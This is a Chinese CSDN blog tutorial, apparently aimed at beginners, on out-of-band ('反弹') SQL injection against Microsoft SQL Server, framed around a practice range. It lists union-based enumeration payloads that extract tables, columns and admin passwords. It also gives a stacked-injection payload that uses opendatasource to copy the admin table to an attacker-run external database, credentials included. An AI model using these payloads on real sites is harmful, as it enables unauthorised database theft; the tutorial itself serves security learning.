网络安全零基础入门(第六章-4)MSsql注入——反弹注入

最新推荐文章于 2024-04-15 09:30:54 发布
最新推荐文章于 2024-04-15 09:30:54 发布
阅读量192 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43660456/article/details/105414236
版权
  • 每日一句:MSsql注入攻击是最复杂的数据库攻击技术
  • 本篇内容:MSSQL反弹注入使用场景
         快速搭建一个MSSQL环境(骚姿势)
         MSSQL反弹注入语句解析
         MSSQL反弹注入实战注意

一、MSSQL反弹注入使用场景

1.什么是MSSQL
    MSSQL就是Sql server数据库的服务器
    
2.前言
    MSSQL注入攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,
    存储过程以及函数语句十分丰富,这些灵活的语句造就了新颖独特的攻击思路
   
2.反弹注入缘由
    明明有注入点却无法进行注入,工具攻击速度也是异常缓慢,错误提示信息关闭,
    无法返回注入结果,这些都是在注入攻击中常常遇到的问题。为例解决以上的疑难杂症,
    我们来学习反弹注入,反弹注入则依靠opendatasource函数支持
    
3.原理
    反弹注入就是利用opendatasource函数,将当前数据库中的查询结果发送给另一个数据库中

二、快速搭建一个MSSQL环境(骚姿势)

1.利用十分重邮箱(例如:bccto.me)在香港云上白嫖一个服务器(webweb.com)
    
2.根据目标数据库,建立相同类型数据库,建立表(表名随意),字段(名字随意,字段一定相同)

三、MSSQL反弹注入语句解析

1.注意测试的数据库是sql server时,语句有点不太一样
    例如:url id=1
       id=1’ union all select null,null,null from news – qwe
       
    注意:
      ~union后注意有个 all
      ~select后,慎重写1,2,3,也不是不可以,这的数据类型要一致。
      因为一般来说,我们都不知道,所以写null,即无类型
      之后,可以用asd来测试是不是字符,这样以此来测试
       
2.直接在sql server数据库中查询
    查库:select name from dbo.sysdatabases(或者:select * from dbo.sysdatabases)
       //name是库默认属性
       //查询所有库,查出来有默认库
         
    查表:select *from dbo.sysobjects where xtype=‘U’
       //稍微改一点关键词,注意增加xtype判断,后边的‘U’是用户的意思
       //代表查询用户创建的表,不然会查出很多表
       
    查字段:select * from dbo.syscolumns where id=111
    
   注意:一般不查库也行,毕竟很多东西都放在同一个库中
      id是SQL server表默认的字段,类似的还有name
       
      额外提一个系统自带表:master
      它是保存了,所有的库名,以及库的ID,和一些相关信息。
      在查系统所有库的时候,完整的语句应该是:
      select * from master.dbo.sysdatabases
       
3.搞靶场中(反弹注入步骤
    测试:url id=1’ --> url id=1’-- qwe
    
    猜字段:url id=1’ order by 3 – qwe  //假设3个字段
    
    查库名:url id=1’ union all
    
    查表名:url id=1’ nuion all select id,name,null from dbo.sysobjects where xtype=‘U’ – qwe
    
    查字段:url id=1’ union all select null,name,null from dbo.syscolumns where id=xxxxxx – qwe
    查内容:url id=1’ union all select null,passwd,null from admin-- qwe
        //这个passwd是之前爆出的字段
        
4.反弹注入语句
   经典语句

url?id=1';insert into opendatasource('sqloledb','server=SQL5006.webweb.com,1433;uid=DB_14B8A62_AB_admin;pwd=123456789;database=DB_14B8A62_AB').DB_14B8A62_AB_dbo.a select * from admin -- wqe

四、MSSQL反弹注入实战注意

1.目标数据库要和自己搭建的一致,
    mysql对应mysql
    sql server 对应sql server
    
2.“;”结尾,堆叠注入
    不能用and代替,堆叠语句就是执行多条数据

五、总结

  • 理解反弹注入原理
  • 熟练掌握反弹注入步骤
  • 牢记反弹注入经典语句
划水的小白
关注
MSSQL入门基础经典
sophia_wjy的专栏
11-14 1288
sql分享  说明:复制表(只复制结构,源表名:a 新表名:b)    SQL: select * into b from a where 1   说明:拷贝表(拷贝数据,源表名:a 目标表名:b)    SQL: insert into b(a, b, c) select d,e,f from b;       说明:显示文章、提交人和最后回复时间
网络安全入门到精通(完全0基础)持续更新
2301_79969541的博客
09-12 943
web安全从无到有(持续更新哦)
MSSQL注入--反弹注入
weixin_30873847的博客
06-25 585
明明是sql注入的点,却无法进行注入,注射工具拆解的速度异常的缓慢,错误提示信息关闭,无法返回注入的结果,这个时候你便可以尝试使用反弹注入反弹注入需要依赖于函数opendatasource的支持,将当前数据库中的查询结果发送到另一数据库服务器中。 判断数据库类型 and exists (select * from sysobjects)--返回正常为mssql(也名sql serve...
渗透测试入门—— 常见术语概述
weixin_46694260的博客
12-26 9064
00x1 前言 刚入门小白,收集了一些渗透术语,废话不多说。 00x2 渗透术语 1.脚本 动态网站(如:asp,php,jsp), linux, python 2.网站 2.1静态网站:与后台交互比较少,如html) 2.2动态网站:使用动态脚本编写 如:asp,php,jsp,交互方便但是安全性不高,如果代码过滤不严格可能会导致漏洞最终导致后台linux被别人随意操作 3.http协议 http(HyperText Transfer Protocol),超文本传输协议。是因特网上应用最为广泛的一种网络传
最全CTF Web题思路总结(更新ing)
热门推荐
yjprolus的博客
02-12 5万+
个人向CTF Web题思路总结笔记
Notes Twelfth Day-渗透攻击-红队-命令与控制
qq_34801745的博客
09-28 1万+
** Notes Twelfth Day-渗透攻击-红队-打入内网(dayu) ** 作者:大余 时间:2020-09-28 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更好
Notes Ninth Day-渗透攻击-红队-打入内网
qq_34801745的博客
09-25 1万+
** Notes Ninth Day-渗透攻击-红队-打入内网(dayu) ** 作者:大余 时间:2020-09-25 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更好的继
Notes Fifteenth Day-渗透攻击-红队-内部信息搜集
qq_34801745的博客
10-01 1万+
** Notes Fifteenth Day-渗透攻击-红队-打入内网(dayu) ** 作者:大余 时间:2020-10-1 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更
一个内网安全攻防的知识仓库(非常详细)零基础入门到精通,收藏这一篇就够了
Python_0011的博客
04-15 821
信息搜集字典列表密码生成邮箱列表获取泄露密码查询对企业外部相关信息进行搜集子域名获取githubwhois查询/注册人反查/邮箱反查/相关资产开源情报信息收集(OSINT)创建企业密码字典进入内网基于企业弱账号漏洞基于系统漏洞进入网站应用程序渗透无线Wi-Fi接入隐匿攻击Fronting代理内网跨边界应用EWTermite代理脚本内网跨边界转发内网跨边界代理穿透shell反弹内网文件的传输和下载搭建 HTTP server内网信息搜集端口扫描。
SQL注入——mssql注入
01-19
1、Mssql权限问题 Mssql角色: 服务器角色–针对运行整个数据库服务器设定的角色和权限。 数据库角色–针对某个特定数据库设定的角色和权限。 固定服务器角色  sysadmin  ...
python 零基础学习篇-MSSQL、MySQL、Oracle 三大主流数据库快速上手第十六章1-2.mp3
05-08
python 零基础学习篇-MSSQL、MySQL、Oracle 三大主流数据库快速上手第十六章1-2.mp3
MSSQL注入——反弹注入
m0_55854679的博客
02-18 913
文章目录MSSQLSQL server】反弹注入使用场景快速搭建MSSQL环境MSSQL数据库反弹注入语句分析OPENDATASOURCE函数练习第一种方法——联合查询注入第二种方法——反弹注入+堆叠注入 MSSQLSQL server】反弹注入使用场景 与mysql大同小异,注入思路相同,但用到的函数等不同。 反弹注入 => 注入的手法(偏门)oob => 把查询到的数据插入外部的数据库(公网ip),反弹注入实际就是把查询出来的数据发送到我们的MSSQL服务器上。 快速搭建MSSQL
五、注入(4)MSsql注入——反弹注入
weixin_45540609的博客
04-21 222
MSSQL反弹注入 当明明是注入点却无法进行注入注入工具猜解速度缓慢,错误提示信息关闭,无法返回注入结果等。这时比较好的方法就是使用反弹注入,需要依靠opendatasource函数支持。 反弹注入:目标站点把查询数据的结果插入到黑客的数据库里 条件: 1、网络通畅(需要公网ip) 2、自己的MSSQL数据库 可以申请一个免费的虚拟空间,虚拟空间中开启MSSQL然后直接使用,可以免去MSSQL安装环境且不需要特意购置云服务器来获取一个公网IP。 香港云 http://www.webweb..
辽宁对外经贸学院在湖南2021-2024各专业最低录取分数及位次表.pdf
09-23
全国各大学在湖南2021-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
【SCI2区】基于matlab VMD-灰狼算法GWO-LSTM光伏预测【含Matlab源码 7666期】.zip
最新发布
09-23
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2023b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 VMD-智能优化算法优化LSTM回归预测系列程序定制或科研合作方向: 4.4.1 VMD-遗传算法GA/蚁群算法ACO优化LSTM回归预测 4.4.2 VMD-粒子群算法PSO/蛙跳算法SFLA优化LSTM回归预测 4.4.3 灰狼算法GWO/狼群算法WPA优化LSTM回归预测 4.4.4 VMD-鲸鱼算法WOA/麻雀算法SSA优化LSTM回归预测 4.4.5 VMD-萤火虫算法FA/差分算法DE优化LSTM回归预测 4.4.6 VMD-其他优化算法优化LSTM回归预测
解读X-RFID芯片中的XLPM一次性编程存储特性
09-23
内容概要:本文解析了XLPM存储器的一次编程特性,并讨论了其基于比特级别单向不可逆变化的工作方式以及RFID设备中具体的写操作机制。此外,还探讨了协议规定对写操作时间和写失败情况的相关规定。 适用人群:硬件工程师和技术支持团队。 使用场景及目标:用于深入理解XLPM OTP存储技术并在X-RFID应用场景下进行可靠的程序烧录。 其他说明:对于理解OTP存储解决方案在无线射频标识(RFID)系统应用中的局限性和优化提供了帮助。
基于C语言的Horizon操作系统半成品设计源码
09-23
该项目是基于C语言的Horizon操作系统半成品设计源码,包含157个文件,其中包括62个头文件(.h),52个C源文件(.c),8个Makefile文件(.mk),6个JSON配置文件,4个汇编语言文件(.asm),2个链接脚本文件(.lds),1个Clang格式配置文件(.clang-format),1个YAML配置文件(.yml),1个Git忽略文件(.gitignore)和1个许可证文件(LICENSE)。这个系统是一个独立制作的半成品操作系统。
190号资源-源程序:论文+程序 基于在线优化的快速模型预测控制-本人博客有解读
09-23
该资源详细解读可关注博主免费专栏《论文与完整程序》190号博文 MPC通过预测未来一段时间内系统的行为来优化控制输入,以达到特定的控制目标。其核心思想是利用系统的动态模型,通过求解优化问题,实时调整控制策略。 在实施过程中,MPC需要实时获取系统状态,并基于当前状态和预测模型计算未来的控制动作。这一过程涉及多个关键步骤:首先,建立一个准确的系统模型以捕捉动态行为;其次,设定控制目标和约束条件;最后,通过优化算法求解控制输入,这一过程需要高效的计算能力。 快速MPC的关键在于优化算法的效率,通常采用迭代方法或简化模型来加速计算,从而满足实时性要求。这使得MPC在工业自动化、机器人控制以及无人驾驶等领域得到广泛应用。 总之,基于在线优化的快速模型预测控制通过其预测能力和在线调整特性,实现了对复杂系统的高效控制,能够有效应对动态变化和外部扰动,提升系统的稳定性和性能。
MSSQL注入漏洞与防御解析
在"Mssql高手注入.txt"文档中,主要探讨了SQL注入攻击的相关技术,特别是在Microsoft SQL Server数据库环境中的高级技巧。文本详细介绍了几种不同的SQL注入实例,旨在展示黑客如何利用这些漏洞来获取敏感数据或者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值